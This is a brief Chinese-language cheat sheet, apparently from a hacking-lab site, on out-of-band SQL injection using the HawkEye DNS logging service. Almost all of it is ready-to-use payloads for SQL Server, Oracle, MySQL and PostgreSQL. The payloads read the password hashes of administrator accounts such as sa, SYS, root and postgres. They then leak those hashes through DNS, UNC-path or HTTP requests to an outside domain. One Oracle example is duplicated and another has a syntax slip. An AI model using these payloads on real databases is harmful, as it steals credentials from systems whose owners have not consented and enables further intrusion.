HawkEye Log/Dns 在Sql注入中的应用

Hawkeye: http://hawkeye.hackinglab.cn/

支持的数据库类型

• SQL Server
• Mysql
• Oracl
• PostgresSQL

注入姿势

SQL Server

Example:

DECLARE @host varchar(1024);
  SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.s.livesina.com';
  EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

Oracle

Example1:

SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');

Example2:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example3:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example4:

SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example5:

SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;

Example6:

 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;

Mysql

Exmaple:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));

PostgreSQL

Example:

DROP TABLE IF EXISTS table_output;
   CREATE TABLE table_output(content text);
   CREATE OR REPLACE FUNCTION temp_function()
   RETURNS VOID AS $$
   DECLARE exec_cmd TEXT;
   DECLARE query_result TEXT;
BEGIN
   SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
   exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
   EXECUTE exec_cmd;
   END;
   $$ LANGUAGE plpgsql SECURITY DEFINER;
   SELECT temp_function();